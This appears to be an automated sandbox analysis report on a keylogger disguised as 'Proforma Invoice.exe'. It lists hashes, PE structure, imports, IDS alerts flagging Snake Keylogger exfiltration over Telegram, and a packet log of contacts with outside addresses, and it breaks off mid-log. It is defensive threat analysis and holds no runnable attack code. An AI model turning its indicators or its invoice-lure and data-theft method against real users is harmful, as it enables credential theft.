                                                                                              Size (bytes):9692
                                                                                              Entropy (8bit):7.598267964224609
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:c09SJLZ7jNO7shj/XD+9uTiSeShmJJggNJchEQX6pkVyA0fApOfYTRBuRuobuDG8:X9SJtjh/XD+o2wgPnchxXNVyA8AUfmIu
                                                                                              MD5:EA14E6666108A4F985B9BB82948CCCC5
                                                                                              SHA1:94BEB01C2EAA118F0C2970EB07E6757A24233D60
                                                                                              SHA-256:7C6453CA557E8D2163742521295C1D8E427B31BD8EB4B99216C9AFA5E3BBF0E2
                                                                                              SHA-512:C2495C5A0E52C735CA579D40F3117FB6EF15A900CB95535C46187FB2780C5042FBA5155A8CEC57F9489236CBCEE2376E3FBE1C77EBB63BE904C2099A65C5838C
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:EA06..p..L&.[...e....;..`....y...b.......s8..&...j.%.$.m8..Sp.N.g.....m.X@..K...c.$....lL.`..Ng6)...l.I...b....4..,S@..l.l.-z..f.6|v...Qc.0.......q4.Y..k..h......c ._..p.1....qa.H....9..$l.3..Y@.6...$.a5.H.f@.....|3....fs9..%d.M...5...&.@.@.K.I.....Y.x>9.....Y.j.;.......j.;-....Y@j.9.....K,..1...'.`....|.....,S`..N,`...H.......|....F. ,_...c3..........;..:&.>_L.n....f.G_T......|.).......&.....8...&V....ia...=.....Y......&..`.l..|.[.....Yl ....ab...,@....ib........h.._..@...3|.P.o.ac.....+.....N.i|sk....8..4|.0...c....7....k ..7.X..TD....M&`....g....,,`....>.Y...$.@&....L&.P.....32.|&.G%......h...,..33.%.....BS...Nf......f.4.L,.9."....Bvp.Y...ffS{$..d..,.@8@.......@.3d.L..k4.h..M.B:.Y...fg6.;.ab....98.L..:.....of.L.*..Fp........36.Y&.k,.b...' !...,t.33.4.c2.X.M....#......j.d...[..%3.....c....M'6...ic....!..,..3 k..p....@...L&..........., ....#......f.8.X..K..`....zn........0{.k7....!..,...S.%..9..J@^@.G'.......aa.M..)LM@B:.Y...ffS...r....@...N@.:.....n..Mf@....
                                                                                              Process:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):93696
                                                                                              Entropy (8bit):6.906412491860936
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:QJgCMwAhNyuXH41RzjzJBjhMJ8JzU5ErRvahFT1bfa7JjMPFVFMRmNDK:3CMwChIrzxBjCJ6w5ErlCF57atjMPFj8
                                                                                              MD5:73BB5A555A277F646C728D8DDD56E8BB
                                                                                              SHA1:056DB1047A44D4DDDC6AD908CA8E83BD0F9E952C
                                                                                              SHA-256:A793E580832FE31A83401392E1F83EAF7B421F377E164E64859F1FE32133D0F1
                                                                                              SHA-512:4AC0D7330970BB42FA9A903722E341853EA763F40E0460B366D60749EF55FEDB1E1D0ADAE16D380690248353CA7F191DB291BB8D98286D7E577BD546F3FDA163
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:tk.LP9MMRB8A.QG.EE2NZFP.U91NLS9MMVB8A4ZQGEEE2NZFPCU91NLS9MM.B8A:E.IE.L.o.G..tmY'?sI?"10Y,.90)+*1.,?f"6;.X l.v.m;-\$.W\MaEE2NZFP..91.MP9.w#.8A4ZQGEE.2L[MQ.U9UOLS1MMVB8A:.PGEeE2N.GPCUy1NlS9MOVB<A4ZQGEEA2NZFPCU9.OLS;MMVB8A6Z..EEU2NJFPCU)1N\S9MMVB(A4ZQGEEE2NZ..BUr1NLS.LM.G8A4ZQGEEE2NZFPCU91N.R9AMVB8A4ZQGEEE2NZFPCU91NLS9MMVB8A4ZQGEEE2NZFPCU91NLS9MmVB0A4ZQGEEE2NZNpCUq1NLS9MMVB8A..4?1EE2Z8GPCu91N(R9MOVB8A4ZQGEEE2NZfPC5.C=>09MM.G8A4.PGECE2N<GPCU91NLS9MMVBxA4..5 )*QNZJPCU9.OLS;MMV.9A4ZQGEEE2NZFP.U9sNLS9MMVB8A4ZQGEE..OZFPCUq1NLQ9HMN.8A..QGFEE2.ZFV#.91.LS9MMVB8A4ZQGEEE2NZFPCU91NLS9MMVB8A4ZQGEEE2.'._...X=.9MMVB8@6YUAMME2NZFPCUG1NL.9MM.B8A.ZQG`EE2#ZFPgU910LS93MVB\A4Z#GEE$2NZ.PCUV1NL=9MM(B8A*XyXEEO.hZDxcU9;Nf.JlMVH.@4ZU4gEE8.XFPG&.1NF.:MMR1.A4P.CEEAAkZFZ.P91Jf.9N.@D8A/5iGEOE1.O@PCN..NN{.MM\B.g4Y.RCEE)dxFR.\91Jf.JPMVD..4Z[3LEE0.PFPG.'3f.S9Ggt<+A4^zGog;&NZB{C..O[LS=fM|`FW4ZUlEogLYZFThU.7d.SK.AV2;.UZQAm.E2Dr.PCS9.tL-7MMR@W.4Z[ao.E..ZFVC}o1NJS..MVD8i`ZQAEm.2N\FzyU.aNLU9e.VB>A..Q9vEE6b]8cCU=.X2b9MI.D@A
                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Entropy (8bit):6.827037255023258
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:Proforma Invoice.exe
                                                                                              File size:955'392 bytes
                                                                                              MD5:58d259f56b4715bcea1ddebbc2735eb2
                                                                                              SHA1:70ed1319ecebab15376dca298c0add6884c1f7f6
                                                                                              SHA256:d88aeea1b3297511f942b7caab86deab58ed647d5a6bbce0844b83481dd259a7
                                                                                              SHA512:b17030da305ea24aab7f043e82134b6177512f22b3b0a34963f642033e095c12a316f4a44b315508a8d9c6a90ee31ca969d2d2559b59904ab0d0ce80476d9f29
                                                                                              SSDEEP:24576:Xu6J33O0c+JY5UZ+XC0kGso6FadpcV1WY:xu0c++OCvkGs9FadyiY
                                                                                              TLSH:1715AE2273DDC360CB669173BF6AB7056EBF3C610630B85B2F980D7DA950161262D7A3
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                                                              Icon Hash:aaf3e3e3938382a0
                                                                                              Entrypoint:0x427dcd
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0x67696C64 [Mon Dec 23 13:57:56 2024 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:5
                                                                                              OS Version Minor:1
                                                                                              File Version Major:5
                                                                                              File Version Minor:1
                                                                                              Subsystem Version Major:5
                                                                                              Subsystem Version Minor:1
                                                                                              Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                                              Instruction
                                                                                              call 00007FBCC4BF58CAh
                                                                                              jmp 00007FBCC4BE8694h
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              push edi
                                                                                              push esi
                                                                                              mov esi, dword ptr [esp+10h]
                                                                                              mov ecx, dword ptr [esp+14h]
                                                                                              mov edi, dword ptr [esp+0Ch]
                                                                                              mov eax, ecx
                                                                                              mov edx, ecx
                                                                                              add eax, esi
                                                                                              cmp edi, esi
                                                                                              jbe 00007FBCC4BE881Ah
                                                                                              cmp edi, eax
                                                                                              jc 00007FBCC4BE8B7Eh
                                                                                              bt dword ptr [004C31FCh], 01h
                                                                                              jnc 00007FBCC4BE8819h
                                                                                              rep movsb
                                                                                              jmp 00007FBCC4BE8B2Ch
                                                                                              cmp ecx, 00000080h
                                                                                              jc 00007FBCC4BE89E4h
                                                                                              mov eax, edi
                                                                                              xor eax, esi
                                                                                              test eax, 0000000Fh
                                                                                              jne 00007FBCC4BE8820h
                                                                                              bt dword ptr [004BE324h], 01h
                                                                                              jc 00007FBCC4BE8CF0h
                                                                                              bt dword ptr [004C31FCh], 00000000h
                                                                                              jnc 00007FBCC4BE89BDh
                                                                                              test edi, 00000003h
                                                                                              jne 00007FBCC4BE89CEh
                                                                                              test esi, 00000003h
                                                                                              jne 00007FBCC4BE89ADh
                                                                                              bt edi, 02h
                                                                                              jnc 00007FBCC4BE881Fh
                                                                                              mov eax, dword ptr [esi]
                                                                                              sub ecx, 04h
                                                                                              lea esi, dword ptr [esi+04h]
                                                                                              mov dword ptr [edi], eax
                                                                                              lea edi, dword ptr [edi+04h]
                                                                                              bt edi, 03h
                                                                                              jnc 00007FBCC4BE8823h
                                                                                              movq xmm1, qword ptr [esi]
                                                                                              sub ecx, 08h
                                                                                              lea esi, dword ptr [esi+08h]
                                                                                              movq qword ptr [edi], xmm1
                                                                                              lea edi, dword ptr [edi+08h]
                                                                                              test esi, 00000007h
                                                                                              je 00007FBCC4BE8875h
                                                                                              bt esi, 03h
                                                                                              jnc 00007FBCC4BE88C8h
                                                                                              Programming Language:
                                                                                              • [ASM] VS2013 build 21005
                                                                                              • [ C ] VS2013 build 21005
                                                                                              • [C++] VS2013 build 21005
                                                                                              • [ C ] VS2008 SP1 build 30729
                                                                                              • [IMP] VS2008 SP1 build 30729
                                                                                              • [ASM] VS2013 UPD4 build 31101
                                                                                              • [RES] VS2013 build 21005
                                                                                              • [LNK] VS2013 UPD4 build 31101
                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x20b40.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xe80000x711c.reloc
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .rsrc0xc70000x20b400x20c0027863fb35a2fe723e2781fa3f0b102ceFalse0.7990368559160306data7.530634556970464IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .reloc0xe80000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                              RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                              RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                              RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                              RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                              RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                              RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                              RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                              RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                              RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                              RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                              RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                              RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                                                              RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                              RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                                                              RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                              RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                              RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                              RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                              RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                              RT_RCDATA0xcf7b80x17e08data1.0003680981595091
                                                                                              RT_GROUP_ICON0xe75c00x76dataEnglishGreat Britain0.6610169491525424
                                                                                              RT_GROUP_ICON0xe76380x14dataEnglishGreat Britain1.25
                                                                                              RT_GROUP_ICON0xe764c0x14dataEnglishGreat Britain1.15
                                                                                              RT_GROUP_ICON0xe76600x14dataEnglishGreat Britain1.25
                                                                                              RT_VERSION0xe76740xdcdataEnglishGreat Britain0.6181818181818182
                                                                                              RT_MANIFEST0xe77500x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                                              DLLImport
                                                                                              WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                              VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                              COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                              MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                              WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                              PSAPI.DLLGetProcessMemoryInfo
                                                                                              IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                              USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                              UxTheme.dllIsThemeActive
                                                                                              KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                                              USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                                              GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                              COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                                              ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                              SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                              ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                              OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                              EnglishGreat Britain
                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                              2024-12-23T21:50:12.980194+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449730193.122.6.16880TCP
                                                                                              2024-12-23T21:50:20.370754+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449730193.122.6.16880TCP
                                                                                              2024-12-23T21:50:21.959607+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449732149.154.167.220443TCP
                                                                                              2024-12-23T21:50:22.759148+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449732149.154.167.220443TCP
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 23, 2024 21:50:06.751559973 CET4973080192.168.2.4193.122.6.168
                                                                                              Dec 23, 2024 21:50:06.871191978 CET8049730193.122.6.168192.168.2.4
                                                                                              Dec 23, 2024 21:50:06.871278048 CET4973080192.168.2.4193.122.6.168
                                                                                              Dec 23, 2024 21:50:06.872189999 CET4973080192.168.2.4193.122.6.168
                                                                                              Dec 23, 2024 21:50:06.991592884 CET8049730193.122.6.168192.168.2.4
                                                                                              Dec 23, 2024 21:50:12.194752932 CET8049730193.122.6.168192.168.2.4
                                                                                              Dec 23, 2024 21:50:12.200730085 CET4973080192.168.2.4193.122.6.168
                                                                                              Dec 23, 2024 21:50:12.320472002 CET8049730193.122.6.168192.168.2.4
                                                                                              Dec 23, 2024 21:50:12.929435968 CET8049730193.122.6.168192.168.2.4
                                                                                              Dec 23, 2024 21:50:12.980194092 CET4973080192.168.2.4193.122.6.168
                                                                                              Dec 23, 2024 21:50:13.117285967 CET49731443192.168.2.4104.21.67.152
                                                                                              Dec 23, 2024 21:50:13.117398977 CET44349731104.21.67.152192.168.2.4
                                                                                              Dec 23, 2024 21:50:13.117489100 CET49731443192.168.2.4104.21.67.152
                                                                                              Dec 23, 2024 21:50:13.128449917 CET49731443192.168.2.4104.21.67.152
                                                                                              Dec 23, 2024 21:50:13.128493071 CET44349731104.21.67.152192.168.2.4
                                                                                              Dec 23, 2024 21:50:14.357244968 CET44349731104.21.67.152192.168.2.4
                                                                                              Dec 23, 2024 21:50:14.357372999 CET49731443192.168.2.4104.21.67.152
                                                                                              Dec 23, 2024 21:50:14.363632917 CET49731443192.168.2.4104.21.67.152
                                                                                              Dec 23, 2024 21:50:14.363667011 CET44349731104.21.67.152192.168.2.4
                                                                                              Dec 23, 2024 21:50:14.364218950 CET44349731104.21.67.152192.168.2.4
                                                                                              Dec 23, 2024 21:50:14.417618990 CET49731443192.168.2.4104.21.67.152
                                                                                              Dec 23, 2024 21:50:14.418540955 CET49731443192.168.2.4104.21.67.152
                                                                                              Dec 23, 2024 21:50:14.459343910 CET44349731104.21.67.152192.168.2.4
                                                                                              Dec 23, 2024 21:50:14.805088043 CET44349731104.21.67.152192.168.2.4
                                                                                              Dec 23, 2024 21:50:14.805154085 CET44349731104.21.67.152192.168.2.4
                                                                                              Dec 23, 2024 21:50:14.805326939 CET49731443192.168.2.4104.21.67.152
                                                                                              Dec 23, 2024 21:50:14.813358068 CET49731443192.168.2.4104.21.67.152
                                                                                              Dec 23, 2024 21:50:19.916575909 CET4973080192.168.2.4193.122.6.168
                                                                                              Dec 23, 2024 21:50:20.058106899 CET8049730193.122.6.168192.168.2.4
                                                                                              Dec 23, 2024 21:50:20.324302912 CET8049730193.122.6.168192.168.2.4
                                                                                              Dec 23, 2024 21:50:20.370754004 CET4973080192.168.2.4193.122.6.168
                                                                                              Dec 23, 2024 21:50:20.490653992 CET49732443192.168.2.4149.154.167.220
                                                                                              Dec 23, 2024 21:50:20.490709066 CET44349732149.154.167.220192.168.2.4
                                                                                              Dec 23, 2024 21:50:20.490777016 CET49732443192.168.2.4149.154.167.220
                                                                                              Dec 23, 2024 21:50:20.491200924 CET49732443192.168.2.4149.154.167.220
                                                                                              Dec 23, 2024 21:50:20.491214991 CET44349732149.154.167.220192.168.2.4
                                                                                              Dec 23, 2024 21:50:21.904944897 CET44349732149.154.167.220192.168.2.4
                                                                                              Dec 23, 2024 21:50:21.905019045 CET49732443192.168.2.4149.154.167.220
